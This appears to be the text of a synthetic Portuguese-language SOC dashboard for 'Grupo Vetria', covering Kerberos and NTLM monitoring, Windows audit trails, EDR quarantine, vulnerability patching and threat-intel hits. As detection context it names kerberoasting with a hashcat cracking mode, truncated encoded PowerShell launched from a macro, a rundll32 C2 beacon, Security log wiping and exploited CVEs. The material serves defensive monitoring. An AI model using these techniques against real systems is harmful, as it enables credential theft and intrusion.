DoH BLOQUEADOPOL-EGRESS-04
srv-mail-01
DMZ · SMTP
198.51.100.23:443
TLS · mesmo destino do beacon
1.440
12,6 MB
VÍNCULO TK-3046760 s · cdn-metrics[.]io
POL-EGRESS-04: 443/53 só via proxy px-mtz-01 (3 exceções em allowlist) · pdv-fil07-03 nunca havia falado direto — Yasmin R. valida com a filial até 18h
Resolvers & Volume · 41M/24h
syslog DNS dos DCs · 4 respondedores vistos na rededc-jdi-01
PDC · fábrica Jundiaí
25,0M · 61,0%
dc-spo-01
DC SP · colocation
12,7M · 31,0%
dc-mtz-01
matriz SP
3,2M · 7,7%
10.20.61.44:53
fora do AD · sem CMDB
118k · 0,3%
3,0M1,5M0
pico 2,9M/h · 02h · backup + varredura
agora 1,8M/h
15h19h23h03h07h11h15h12
⚠ 10.20.61.44 responde DNS fora do AD — mesmo host do poro 8443 (R-163 · RITM-2201) · TK-30482 · bloqueio na GMUD ter 22/07 22h · Douglas M.
DNS logs dos DCs + FortiGate DNS filter + Sysmon EID 22 · 41M consultas/24h · janela 24h · Grupo Vetria · dom 20/07 15:12
EV-11 · 11 de 17
Grupo Vetria / Segurança & SOC / Kerberos & NTLM
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Mapa de Calor de TGS por SPN · watch de kerberoasting
6 DCs → Wazuh · EID 4769 · dedup por SPN · 24h · top-12 = 96% do volumeTGS · 4769 · 24h1,9Mméd 79k/h · pico 08h · 6 DCs
TGT · 4768 · 24h214krazão TGS/TGT 8,9× · dentro do baseline
Tickets RC4 · 0x17312100% → MSSQLSvc · 03h02–03h18
SPNs em watch3TK-30470 · abertura Vigia8 03h26
⚠ RC4 (0x17) = ticket cifrado com o hash NT da conta de serviço — exportável p/ cracking offline (hashcat -m 13100) · AES256 (0x12) inviabiliza o ataque
▸ wzh-mgr-01 · wazuh-alerts-4.x · q: eventID:4769 AND ticketEncryptionType:"0x17" AND NOT serviceName:"krbtgt" · janela 24h → 312 hits · 4 contas · 1 SPN
CIFS/srv-arq-01.vetria.corp
conta: SRV-ARQ-01$ (máquina) · rotação 30d · AES-only
486,2kTGS
24h
24h
0x12 AES256 · 100%2.104 contas
arquivos + fiscal · DFS · perfis de rede · pico 08h–11h acompanha o expediente
SAUDÁVEL#1 em volume · 25,6% do total
HOST/dc-jdi-01.vetria.corp
conta: DC-JDI-01$ · PDC emulator · AES-only
322,4kTGS
24h
24h
0x12 AES256 · 100%1.877 contas
GPO · SYSVOL · NETLOGON · replicação com dc-jdi-02 em 00:01
SAUDÁVELauth JDI 47% do domínio
MSSQLSvc/srv-erp-01.vetria.corp:1433
conta: svc-protheus · senha 412d · RC4+AES permitidos
214,8kTGS
24h
24h
AES256 · 214,5k0x17 RC4 · 312
RC4 pedido por 4 contas: m.tavares · l.prado · c.duarte · r.gusmao · 03h02–03h18 · origem wks-fab-109 (10.20.61.109) → ALR-8843
KERBEROASTING PROVÁVEL · TK-30470pico 03h
LDAP/dc-spo-01.vetria.corp
conta: DC-SPO-01$ · colocation SP · AES-only
172,3kTGS
24h
24h
0x12 AES256 · 100%binds de app
microserviços do portal e ERP fazem bind LDAPS 636 · service discovery
SAUDÁVELcanal assinado · LDAPS
HTTP/nfe.vetria.corp
conta: svc-nfe · senha 88d · AES-only · gMSA planejada
158,1kTGS
24h
24h
0x12 AES256 · 100%CRÍTICO P/ FATURAMENTO
emissão NF-e / SEFAZ-SP · R$ 138k/h de parada · delegação restrita (constrained)
SAUDÁVELmigração p/ gMSA na fila de set/26
CIFS/srv-bkp-01.vetria.corp
conta: SRV-BKP-01$ · job de fita 02h · AES-only
121,7kTGS
24h
24h
0x12 AES256 · 100%pico 02h
correlato ao pico de 23,4k EPS às 02h (backup + varredura) · imutável testado 12/07
SAUDÁVELjanela 02h–04h · srv-bkp-01
exchangeMDB/srv-mail-01.vetria.corp
conta: svc-exchange · senha 918d · RC4 habilitado
96,3kTGS
24h
24h
AES256 · 100% hojeRC4 habilitado
roastable: senha de 918d + 0x17 permitido no atributo msDS-SupportedEncryptionTypes
WATCH · TK-30470remoção do RC4 na GMUD 2260
HTTP/portal-vetria.vetria.corp
conta: svc-portal · senha 380d · RC4 habilitado
88,9kTGS
24h
24h
AES256 · 100% hojeRC4 habilitado
03h04 · as mesmas 4 contas pediram TGS (AES retornado) — enumeração da mesma campanha
WATCH · enumerado 03h04DMZ · WAF à frente
MSSQLSvc/srv-folha-01.vetria.corp:1433
conta: svc-folha · senha 132d · AES-only
64,2kTGS
24h
24h
0x12 AES256 · 100%Folha Senior
picos nos dias 05 e 20 (fechamento da folha) · janela hoje dentro do esperado
SAUDÁVELacesso restrito ao grupo RH-folha
HOST/srv-erp-01.vetria.corp
conta: SRV-ERP-01$ · agendador + WinRM · AES-only
58,6kTGS
24h
24h
0x12 AES256 · 100%tasks + WinRM
volume plano 24h · integrações do Protheus · sem sazonalidade de expediente
SAUDÁVELWinRM só da VLAN de gestão
TERMSRV/srv-arq-01.vetria.corp
conta: SRV-ARQ-01$ · RDP administrativo via PAM
21,4kTGS
24h
24h
0x12 AES256 · 100%42 sessões
RDP sempre intermediado pelo PAM · gravação de sessão ativa · 0 acesso direto
SAUDÁVELNLA obrigatório
IMAP/srv-mail-01.vetria.corp
conta: svc-exchange · clientes móveis legados
12,8kTGS
24h
24h
0x12 AES256 · 100%118 clientes
só filiais · maioria PDV com coletor de e-mail · candidato a desativação
SAUDÁVELestudo de desativação em ago/26
✎ caça TK-30470 (Vigia8 03h26 → Renata C. 14h10): senha das 4 contas suspeitas expirada às 03h40 · rotação de svc-protheus (28 chars) na GMUD 2260 · hoje 22h · RC4 removido do atributo dos 3 SPNs no mesmo change
Emissão de tickets · 4768 × 4769 · 24h
6 DCs → wzh-mgr-01/02 · bucket 1h · TGS 1,9M · TGT 214k160k120k80k40k0
ev/h · esq. TGS 4769 · dir. TGT 4768 (tracejado)
03h02–18 · 312 TGS RC4 → MSSQLSvc · invisível no volume
02h · backup + varredura
pico 152,4k ev/h · 08h · expediente
agora 15h12 ▾
20k15k10k5k0
00h04h08h12h16h20h23h
4769 TGS · eixo esq.4768 TGT · eixo dir.rajada RC4 · 03hexpediente 08–19h
NTLM Legado · autenticações 24h
EID 4624 · pacote NTLM · v1: 118 em 12 hosts · v2 fallback 1.546 · signing OFF: 3hostpacoteauths 24htendênciadetalheação
wks-fab-101
10.20.61.101 · fábrica
34
Win7 SP1 · sem EDR · compensação: VLAN OT
SMB SIGNING OFF
wks-fab-107
10.20.61.107 · envase L2
28
Win7 · IHM da linha 2 · scan qui 22h: CVE-2017-0144 exposto (KEV)
SMB SIGNING OFF
wks-fab-103
10.20.61.103 · balança
19
Win7 · balança rodoviária · driver 32-bit sem suporte
SMB SIGNING OFF
+9 hosts legados
VLAN OT · Win7 · fábrica
37
plano: isolar VLAN OT · corte de NTLMv1 no switch de acesso
GMUD 2258 · 26/07
srv-arq-01
10.20.4.21 · DC Jundiaí
1.204
fallback Negotiate→NTLM · app fiscal VB6 · TK-29984
EM MIGRAÇÃO
pdv-fil07-03
10.20.107.13 · filial 07
342
driver de impressora fiscal · mapeado · aceito pelo risco
RISCO ACEITO
✎ NTLMv1 expõe hash p/ relay/cracking · LmCompatibilityLevel=5 nos 6 DCs · isolar VLAN OT: GMUD 2258 · dono: infra-redes · Douglas M.
Falhas Kerberos & validação NTLM
EID 4771/4776/4768 · 4771: 900/24h · méd 38/h · Wazuheidcódigoconta / origem24htendênciadetalheação
47710x18 PREAUTH
svc-backup
← 203.0.113.44/.51
611
rajada 02h–04h vs vpn-forti-01 · correlata às 2.417× 4625 do spray
SOC-2214
47710x18 PREAUTH
j.santos
wks-mtz-218 · matriz
12
typo pós-férias · 08h12–08h20 · resolvido no service desk
NORMAL
47710x12 REVOKED
p.moraes
desligado 11/07
31
task agendada órfã em srv-arq-01 (EID 4698) · a cada 45 min
TK-30501
47760xC000006A
impressora-fab-02
fila de impressão
208
senha expirada qui 17/07 · spooler tenta a cada 7 min
TK-30488
47680x25 SKEW
4 hosts · drift
wks-fab-105/108/111 · pdv-fil07-03
57
KRB_AP_ERR_SKEW · drift +6–9 min · NTP da VLAN OT desalinhado
TK-30455
47710x18 PREAUTH
outras 209 contas
cauda · 43 sites
246
≤3 falhas/conta · ruído de digitação · dentro do baseline 7d
BASELINE
✎ svc-backup: reset na GMUD de hoje 22h (SOC-2214 · Renata C.) · task de p.moraes removida 14h58 · NTP OT: TK-30455
Política de Tickets · domínio
GPO Default Domain Policy · coleta PowerShell 06h · VETRIA.CORPTGT lifetime10hticket de serviço 600 min · padrão · sem exceções por OU
Renovação máx7dMaxRenewAge padrão · renovações 24h: 11,2k · 0 anômalas
Delegação irrestrita2 contassrv-app-legado + svc-scan · remoção TK-30298
krbtgt · último reset214dmeta <180d · reset sáb 26/07 23h · aprov. pendente
✎ krbtgt: GMUD 2261 aguarda a CAB de ter 22/07 · executor: Marcos P. · 2º reset só após 10h de replicação
DCs 4768/4769/4771/4776 → Wazuh · 2,1M eventos Kerberos/24h · domínio VETRIA.CORP · Grupo Vetria · dom 20/07 15:12
EV-12 · 12 de 17
Grupo Vetria / Segurança & SOC / Auditoria Windows
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Trilha de Mudanças Suspeitas · 24h
Security 4720/4732/4719/7045/4698/1102 + Sysmon 13 → Wazuh · vet-persist-01..06
◄ Mudança controlada · GMUD / rollback
Mudança suspeita · análise / bloqueio ►
hostilaprovadarevertida
▲ sáb 19/07 · 15h
16h
20h
00h · dom
04h
08h
12h
15h12 ▾
Mudanças de persistência · 24h
2115 conciliadas GMUD/baseline
6 na trilha · 2 sob investigação
6 na trilha · 2 sob investigação
eventID:(7045 4698 4719 4720 4732 1102) AND NOT gmud.matched:true
7045×6 · 4698×11 · 4719×1 · 4720×1 · 4732×1 · 1102×1 · dedup host+objeto
janela 14h → 3 mudanças em 33 min · 1 aprovada (4732) · 2 hostis (1102 · 4698)
7045 criado 56 min antes do pico do spray (03h10) · mesma janela 02h–04h · origem em análise
sáb 22h044720Conta de serviço criada · svc-integraAPROVADA · GMUD 2260
dc-jdi-01·poradm-ti-01 (PAM)·origemNew-ADUser · PS 7.4
OU=Servicos,DC=vetria,DC=corp · senha 32c no cofre PAM · logon restrito a srv-erp-01 · janela 22h
09h324719Política de auditoria alteradaREVERTIDA · AUTO
dc-spo-02·porSYSTEM (auditpol.exe)·sessãoconsole local
Object Access › Removable Storage: Success → OFF · fora de GMUD · rollback PB-14 · 09h34 · diff na GPO-AUDIT-DCs
14h224732Membro adicionado a 'Domain Admins'APROVADO · Renata C.
dc-jdi-01·adm-ti-02→ Domain Admins·poradm-ti-01
SID S-1-5-21-…-512 · JIT via PAM · expira 18h00 · Tier-0 sempre entra na trilha, mesmo aprovado
02h147045Serviço novo · 'WinSockDrv'EM ANÁLISE · TK-30481
srv-arq-01·porSYSTEM·origempowershell.exe -nop -w hidden
ImagePath: C:\ProgramData\WinSock\wsdrv64.exe · sha256 9f2a71…c44b · não assinado · start=auto
14h271102Log Security apagadoINVESTIGAÇÃO · TK-30412
srv-folha-01·pord.oliveira·origemwevtutil.exe cl Security
7 min após export da base RH (ALR-8838 · 14h20) · cópia íntegra preservada no Wazuh · retenção 90d
14h554698Task agendada · 'AdobeUpdater2'BLOQUEADA · EDR
wks-fab-109·porc.menezes·origemwinword.exe → powershell.exe
ação: powershell -nop -w hidden -enc SQBFAFgA… · gatilho ONLOGON · bloqueio por comportamento · correlato ALR-8843
✎ Douglas M. detona wsdrv64.exe na sandbox (TK-30481 · resposta até 16h) · 1102 com N2 + jurídico (TK-30412) · Tier-0 e fora-de-GMUD entram sempre na trilha — as 15 conciliadas ficam fora
Objetos Sensíveis · acessos auditados (4663)
SACL VET-SENSIVEL · Event Viewer Security → Wazuh · janela 24h8,4Meventos 4663 · 24h
168sinalizados · 0,002%
2tentativas negadas
41caminhos na SACL
rule.level>=7 AND data.win.system.eventID:4663 AND data.win.eventdata.objectName:@VET-SENSIVEL
objeto · contextocontaacessovol 24h7 dveredito
C:\Windows\NTDS\ntds.ditdc-jdi-01 · 04h02 · 52 min após pico do spray · handle 0x0 (falha)
svc-backup
R
3tent. negadas
NEGADA · ACLSOC-2214 · Renata C.
\\srv-folha-01\RH\Base_Colaboradores_2026.csvexport 14h20 · 8.212 linhas · 38 MB · origem excel.exe
d.oliveira
R
1export · 38 MB
INVESTIGAÇÃOTK-30412 · N2
C:\ProgramData\WinSock\wsdrv64.exesrv-arq-01 · 02h14 · gravado por powershell.exe · vínculo 7045
SYSTEM
W
1gravação
EM ANÁLISETK-30481 · Douglas M.
\\vetria.corp\SYSVOL\…\{31B2F340…}\GptTmpl.infDefault Domain Policy lida por conta de serviço · 1ª vez em 90d
svc-arquivos
R
12leituras
FORA DO PADRÃOAline F. · verificação
\\srv-arq-01\Financeiro\Fechamento_Q2.xlsxconta criada há 17h (GMUD 2260) · integração ERP→BI · observação 7d
svc-integra
R
214leituras
CONTA NOVA · 17hwatchlist até 27/07
\\srv-folha-01\RH\Holerites\2026-07\processamento da folha · janela dom 08h–12h · Senior
svc-folha
RW
12.408r/w
BASELINEjob folha · dom
\\srv-arq-01\Qualidade\Laudos\2026\indexação de conteúdo a cada 4h · job idx-arq
svc-arquivos
R
18.412leituras
BASELINEindexador
\\vetria.corp\SYSVOL\scripts\logon.ps1GMUD 2261 · hash pós-mudança sha256 3db1…9e02 ✓
adm-ti-01
W
2gravações
GMUD 2261conferido 21h58
✎ ntds.dit negada p/ svc-backup → reforça o reset na GMUD de hoje 22h (dono: Marcos P.) · export RH segue com N2 (TK-30412) · revisão da SACL: trimestral · próxima 15/09
Serviços & Tasks novos · 30d
7045 + 4698 → Wazuh · hoje 6 + 11 · baseline 2,1/dia12,08,04,00
barras = 7045 · linha = 4698
hoje: 6 (7045) + 11 (4698)
qui 17/07 · EV-0142
baseline 7045 · 2,1/dia
21/0628/0605/0712/0720/07
serviços de hoje · 70456 novos · 5 conciliados
02h14WinSockDrvsrv-arq-01não assinadoTK-30481
08h12ZabbixAgent2srv-bkp-01assinado ✓GMUD 2262
09h47EdrUpdaterSvcwks-fab-103assinado ✓ROLLOUT EDR
11h32edgeupdatepdv-fil07-03assinado ✓BASELINE
12h48PrintWorkflow_2a4fwks-fab-111per-userBASELINE
13h27FortiClientUpdatewks-fil22-04assinado ✓GMUD 2263
✎ pico de 4698 hoje: 9 das 11 tasks são o rollout do agente EDR (GMUD 2263) · única não conciliada: WinSockDrv · TK-30481
Mudanças de GPO · semana 29
diff SYSVOL 15 min + 5136/4719 → Wazuh · 5 mudanças · 4 aprovadasdom 09h32GPO-AUDIT-DCsauditpol local em dc-spo-02 · fora de GMUDREVERTIDA · PB-14
Object Access › Removable StorageSuccess→OFFv87→v88 · rollback v89 · 09h34
sex 18/07GPO-FIL-Estacoes19h55 · adm-ti-01 · GMUD 2264PILOTO · GA 15/08
Detailed Tracking › Process CreationOFF→ON + cmdlinev54→v55 · 3 filiais
qui 17/07GPO-SEC-Estacoes21h04 · adm-ti-02GMUD 2255
User Config › ScreenSaverTimeout900→600 sv118→v119
ter 15/07GPO-SRV-Hardening21h38 · adm-ti-01GMUD 2252
Features › SMB1Protocol-ClientEnabled→Disabledv72→v73 · 374 srv
seg 14/07Default Domain Policy22h10 · adm-ti-01GMUD 2249
Account Policies › MinPasswordLength10→14v201→v202
✎ mudança sem GMUD dispara vet-gpo-002 (nível 12) + rollback PB-14 · dono: infra AD · PDC dc-jdi-01
Cobertura de Auditoria · por perfil
auditpol via SCA → Wazuh · 4 perfis × 5 categorias · 2 gapsperfillogon 4624-25objeto 4663política 4719privilégio 4673proc. 4688
DCs6 hosts · GPO-AUDIT-DCs
S+F11/11 subcat
S+FSACL 41 obj
S+F+5136 dir. svc
Ssó sensíveis
ON+cmdline
Servidores374 hosts · GPO-SRV-*
S+FRDP/SMB/local
S+F41 caminhos
S+FGPO+local
Spor desenho
ON+cmdline
Estações · mtz+fáb1.850 hosts
S+Flogon local
SSACL mínima
S+FGPO
OFFdesenho · ruído
ON+cmdline
Estações · filiais1.970 hosts · 38 sites
S+Flogon local
PARCIALPDVs sem SACL
S+FGPO
OFFpor desenho
OFFplano 15/08
✎ ligar 4688 nas filiais ≈ +2,1M ev/dia no indexer — capacidade validada · piloto 3 filiais desde 18/07 · GA 15/08 · GMUD 2264 · dono: infra
Event Viewer Security + Sysmon → Wazuh · 4663/7045/4698/4719/4720/4732/1102 · janela 24h–30d · Grupo Vetria · dom 20/07 15:12
EV-13 · 13 de 17
Grupo Vetria / Segurança & SOC / Quarentena EDR
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Mesa de Quarentena · 7 itens retidos
EDR console · política QUAR-30d · sha256 · engines: comportamento · assinatura · ML▸edr.event=quarantine AND (window:24h OR legal_hold:EV-2026-0142) | sort veredito.score desc7 resultados · 0,3 s
4retidos · quarentena
2em custódia · EV-0142
2aguardando decisão
1restaurado · 2 aprov.
23detecções 24h · 7 quarent.
9,8maliciososcore /10
fatura_0687.docmCOMPORTAMENTOEVIDÊNCIA PRESERVADA · CUSTÓDIAqui 17/07 · 14h05
sha256 4c19f2…8b3d · 412 KB · Behav:W97M/OfficeSpawn.PS · vetor do EV-2026-0142
wks-fab-104 · claudio.n · C:\Users\claudio.n\Downloads\fatura_0687.docm
vet-100482 nv14 · T1566.001 → T1059.001 · winword.exe → powershell.exe -nop -w hidden -enc JAB…
QUARENTENA · LEGAL HOLD
exportar só p/ perícia · TK-30421
cadeia de custódia ok · retenção suspensa
9,6maliciososcore /10
upd.dllCOMPORTAMENTOEVIDÊNCIA PRESERVADA · CUSTÓDIAqui 17/07 · 14h12
sha256 9f2a71…c44b · 86 KB · Behav:Win32/Rundll32.C2 · hash 1 de 8 na lista de bloqueio
wks-fab-104 · SYSTEM · C:\Users\Public\upd.dll
vet-100517 nv15 · T1218.011 · rundll32.exe upd.dll,DllRegisterServer → 203.0.113.88:443 · Sysmon EID 7/3
QUARENTENA · LEGAL HOLD
exportar só p/ perícia · TK-30421
push do hash 14h21 · EDR + FortiGate
9,1maliciososcore /10
inv0ice_padrao.xlsmASSINATURAhoje · 14h47
sha256 b3d84f…9f2e · 1,1 MB · Trojan:X97M/DownLdr.GEN · IOC hash · feed comercial (MISP)
pdv-fil07-03 · caixa.fil07 · C:\Users\caixa.fil07\AppData\Local\Temp\inv0ice_padrao.xlsm
PB-05 · AUTO · hit em 48.213 IOCs ativos · bloqueado on-access · TTL do IOC 30d · vínculo ALR-8824
QUARENTENALGPD · PDV
apagar após retenção 30d
quarentena via SOAR PB-05 · sem ação pendente
8,7maliciososcore /10
crack_autocad.exeASSINATURAhoje · 11h18
sha256 d71c02…5aef · 24,6 MB · HackTool:Win32/Keygen.AC!MTB · sem execução (bloqueio on-access)
wks-mtz-217 · p.siqueira · D:\downloads\crack_autocad.exe
on-access 0,4 ms · política PIRATARIA-DENY · notificação ao gestor enviada 11h20 · RH em cópia
QUARENTENA
apagar após retenção 30d
reincidência: 2ª no host em 90d
6,8suspeitoscore /10
macro_rh.docmMLAGUARDANDO DECISÃOhoje · 13h05
sha256 77e0b4…12c9 · 388 KB · ML score 0,68 (corte 0,60) · sem IOC correspondente
srv-folha-01 · m.castro · \\srv-folha-01\rh\modelos\macro_rh.docm
features · macro AutoOpen + POST http 10.20.8.14:8080 (interno) · contém dado pessoal · LGPD
DECIDIR ATÉ 17h30LGPD
restaurar (2 aprov.) ou apagar · TK-30498
dona: Aline F. · valida com RH
6,1suspeitoscore /10
ad_sync.ps1COMPORTAMENTOAGUARDANDO DECISÃOhoje · 05h31
sha256 3fa9d0…7b21 · 6 KB · Behav:PS/LDAPEnum.B · task 4698 diária 05h30
srv-erp-01 · svc-protheus · C:\Scripts\ad_sync.ps1
vet-100244 nv10 · System.DirectoryServices + credencial em claro na linha 41 · sem assinatura digital
DECIDIR ATÉ 18h00
restaurar (2 aprov.) ou apagar · TK-30489
dono: Douglas M. · confirma com infra-ERP
5,4suspeitoscore /10
driver_hp_2026.msiASSINATURARESTAURADO COM APROVAÇÃOhoje · 09h58
sha256 c2481e…d90a · 48,2 MB · Gen:Variant.Fugrafa.118 (heurística) · falso positivo confirmado
wks-fil22-08 · k.tanaka · C:\Users\k.tanaka\Downloads\driver_hp_2026.msi
análise · assinatura digital válida (HP Inc. · cadeia ok) · hash liberado por 90d · FP reportado ao fabricante do EDR
RESTAURADO · 11h32
liberação expira 18/10 · reavaliar
aprovado: Renata C. + Túlio B. · TK-30455
decisão do plantão: ad_sync.ps1 (Douglas M. · TK-30489) e macro_rh.docm (Aline F. · TK-30498) decididos até 18h00 · restauração exige 2 aprovações + ticket · itens em custódia só saem por perícia · TK-30421
Detecções por engine · 30 dias
EDR console → Wazuh · rule.groups:edr AND rule.level>=7 · méd 19,5/dia60,045,030,015,0
23detecções · 24h
comportamento 11
assinatura 8
ML 4
qui 17/07 · EV-2026-0142 · 57 det31 comportamento · 8 hashes → bloqueio
méd 30d · 19,5/dia
Y: detecções/dia · X: 21/06 → 20/07
21/0628/0605/0712/0717/0720/07
Exclusões ativas · 6 de 34
EDR policy EPP-BASE v12 · 3 sem hash · em revisão · auditoria trimestralpath / processo · motivoidadedonohits 7dnºestado
C:\ERP\temp\*.exe
pedida pelo fornecedor Protheus · sem hash
EM REVISÃOTK-30474 · vence 25/07
powershell.exe · C:\Scripts\*
scripts de infra sem assinatura · processo+path
EM REVISÃOTK-30476 · vence 25/07
C:\LabVetria\coletor\*.exe
coletor OT · chão de fábrica · wildcard + exe
EM REVISÃOTK-30479 · VLAN OT
C:\Program Files\Senior\rubi\*.dll
FP recorrente na folha · hash fixado
ATIVAhash fixado · ok
C:\SEFAZ\nfe\out\*.xml
perf · 40k XML/dia no on-access
ATIVArevalidada 04/07
D:\veeam\*.vbk · srv-bkp-01
perf de I/O · full na janela 02h
ATIVAfull sáb 02h · imutável
auditoria dom 20/07: 34 exclusões · 3 sem hash vencem 25/07 (decisão: infra-ERP + SOC · TK-30474/76/79) · regra nova GMUD-4471: exclusão exige hash ou assinatura digital
Varreduras & motor
EDR scheduler · full-scan dom 03h00 · push de assinaturas 2×/dia
Full-scan · dom 20/07 03h00
96,4%concluída · 4.037 hosts vivos
3.892 concluídos · 145 reagendados dom 27/07 (notebooks desligados)
duração méd 1h38 · 12 Win7 fora do escopo · sem EDR · VLAN OT
on-access · latência0,4 ms
média 24h · p95 1,8 ms · p99 4,1 ms · 8,4M eventos 4663/24h
base de assinaturas20260720.2
último push hoje 14h02 · 3.998 ok · 39 atrasados >24h
versão do agente7.4.1182
92,1% em 7.4 · 5,8% em 7.3.9 · 2,1% ≤7.2 (fila de rollout)
Isolamentos de rede · 30 dias
EDR response · network-contain · playbook PB-06 · 3 eventos
qui 17/0714h12
wks-fab-104
EV-2026-0142 · beacon C2 203.0.113.88:443 · contenção via EDR network-contain
SEGUE ISOLADO · FORENSEreimage TK-30421 · libera: perícia
ter 08/0709h24
wks-mtz-152
falso-alarme · assinatura Gen:Variant em instalador NF-e · usuário fiscal
REVERTIDO · 17 MIN09h24 → 09h41 · aprovado Renata C.
qua 02/0711h03
wks-fab-107
falso-alarme · comportamento: agente de inventário OT varrendo SMB
REVERTIDO · 12 MIN11h03 → 11h15 · exclusão por hash
1 procedente · 2 falso-alarme revertidos em <20 min · média de reversão 14,5 min · reversão exige aprovação N2
EDR console + Wazuh · 23 detecções/24h · 7 em quarentena · 34 exclusões (3 em revisão) · Grupo Vetria · dom 20/07 15:12
EV-14 · 14 de 17
Grupo Vetria / Segurança & SOC / Vulnerabilidades
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Quadrante de Priorização · CVSS × EPSS
Wazuh vuln-detector · scan autenticado qui 22h · EPSS v3 FIRST · KEV CISA · 1.842 CVEsEPSS < 0,150,15–0,400,40–0,70≥ 0,70 · agiranel = KEV1 ponto = 1 CVE · amostra 244 de 1.842 · quadrante completo (28)
▶ prioridade da semana: GMUD-1189 · Citrix ADC ter 22/07 21h (dono: infra-web · aprovada dir. TI 18/07) · rollout Outlook TK-30877 até sex 25/07 · exceções revistas seg 09h — Renata C.
Esteira de Patch · campanhas ativas
WSUS · GPO · GMUDs ITSM · SLA crit 7d / high 30dcampanhaalvoaplicadojanelafalhas · motivosla
Citrix ADC 13.1-51.15
CVE-2023-4966 · portal B2B
0/2
ter 22/07 21h
GMUD-1189
GMUD-1189
aguarda GMUD · IPS mitigando (214 hits/24h)
CRIT · 4d
KB5040442 · Win 10/11
CVE-2024-21413 +41 CVEs
1.944/3.187
WSUS · contínua
anel 2/3
anel 2/3
reboot pendente: 84 estações
CRIT · +2d
FortiOS 7.4.4
CVE-2024-21762 · fgt-*
5/40
qui 24/07 22h
GMUD-1181
GMUD-1181
fgt-fil12-01 mudo há 3d — sem confirmação
HIGH · 21d
Chrome 126.0.6478.127
auto-update · gerenciado
2.731/2.904
contínua
anel único
anel único
12 perfis travados · TK-30822
NO PRAZO
Java 8u411 · ERP
Protheus · srv-erp-01
71/187
sáb 26/07
homologação
homologação
3 estações c/ app fiscal legado
HIGH · 11d
KB5040430 · Win Server
96 srv · dc-* · srv-*
45/96
dom 27/07 03h
GMUD-1174
GMUD-1174
disco cheio: 3 (srv-arq-01 +2)
HIGH · 18d
Netlogon enforcement
CVE-2020-1472 · dc-dr-01
0/1
migração DR
set/26
set/26
dep.: NTLMv1 118 auths/24h · 12 hosts
EXCEÇÃO
✎ 84 reboots consolidados na janela dom 27/07 03h (GMUD-1174) · disco: TK-30861 aberto p/ srv-arq-01 · dono da esteira: Douglas M. · falhas notificadas via SOAR PB-09
Aging por Severidade
MTTP · idade média dos 1.842 abertos030d60d90d
média · metaCRÍTICO43 CVEs
9d · meta 7d · +2d acimap90 21d · KEV com fila própria
ALTO312 CVEs
22d · meta 30d · ✓ dentrop90 44d · 28 vencem esta semana
MÉDIO890 CVEs
41d · meta 90d · ✓ dentrop90 76d · ciclo mensal WSUS
BAIXO597 CVEs
68d · sem meta — risco aceitorevisão trimestral · out/26
mais antigo: CVE-2019-0708 (BlueKeep) · srv-app-legado · aberto há 1.126d · aceite assinado
Top Ativos Expostos
crit+high por ativo · scanner + CMDB · dono nomeadovulnerability.severity:(Critical OR High) AND vulnerability.score.base>=7 · index: wazuh-states-vulnerabilities-*
ativoc+hpior cve8 semdecisão registrada
srv-app-legado10.20.8.31 · W2008R2
34
CVE-2019-0708BlueKeep · RDP
risco aceito até migração set/26 — assinado dir. TI
ACEITO
wks-fab-101..112Win7 SP1 · fábrica
28
CVE-2017-0144MS17-010 · SMBv1
compensação: VLAN OT isolada · sem EDR — prioridade rollout
SEM EDR
pdv-fil*38 filiais · Java 8u151
19
CVE-2024-21147Oracle Java SE
campanha Java 38% · fila por filial · TK-30841
CAMPANHA
srv-erp-0110.20.4.11 · Protheus
11
CVE-2024-20952Java SE · lib
aguarda homologação do fornecedor · janela sáb 26/07
HOMOLOG.
vpn-forti-01borda · FortiOS 7.4.3
3
CVE-2024-21762SSL-VPN RCE · KEV
FortiOS 7.4.4 qui 24/07 22h · GMUD-1181 · IPS ativa
JANELA QUI
Correlação IPS ↔ Vulns
o que tentam explorar × o que temos · IPS 512 ev/hassinatura na bordatent. 24hpresença na base
Citrix BleedET 2048933 · CVE-2023-4966
214
PRESENTE · 2 ADCs do portal sem patch
AGIR
Log4ShellET 2034647 · CVE-2021-44228
96
2 apps Java em análise · inventário TK-30799
ANÁLISE
PAN-OS GlobalProtectET 2051790 · CVE-2024-3400
27
0 alvo — sem PAN-OS no parque (CMDB)
SEM ALVO
SMBGhostET 2030338 · CVE-2020-0796
12
corrigido 100% · KB4551762 (2020)
MITIGADO
✓ borda bloqueou 100% das 349 tentativas · inventário Java vence qua 23/07 — Aline F.
Scanner autenticado qui 22h + agente EDR + CMDB · 1.842 CVEs abertos · KEV 17 · EPSS>0,7: 28 · Grupo Vetria · dom 20/07 15:12
EV-15 · 15 de 17
Grupo Vetria / Segurança & SOC / Threat Intel
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Radar de Feeds → Ambiente · pipeline de IOCs
MISP local wzh-mgr-01/02 · TAXII comercial · CERT.br · push API FGT / RPZ / EDR / Wazuh · sync 15 minHITS DE IOC POR DIA · 07/07 → 20/07Σ 521 hits · méd 37,2/dia · qui 17/07: 94 · fonte: Wazuh alerts · rule.groups=threat_intel
hits/dia96,072,048,024,00
méd 37,2/d
qui 17/07 · pós-EV-0142 · 14 hits da infra do caso ▸
hoje ▾ até 15h12
0708091011121314151617181920▾
✎ decisão do plantão: bloqueio automático mantido p/ TLP:AMBER+ · dona do pipeline: Yasmin R. · duplicidade MISP×comercial em revisão set/26 · TK-30455
Hits Recentes · onde o IOC bateu
syslog fgt-mtz-01 · RPZ · EDR · Wazuh · últimos 8 de 61 · 11h32 → 15h07horaIOCtipofeedpontohostação
15h07203.0.113.187IPCOFGTvpn-forti-01DENYEDGE-DENY · TTL 30d · AUTO
14h51vetria-fatura.netDOMINTRPZwks-fab-107NXDOMAINtyposquat WL-04 · TK-30501
14h38sha256:e3d09b…77a1HSHCOEDRwks-fab-112QUARENT.PB-05 · anexo .docm · AUTO
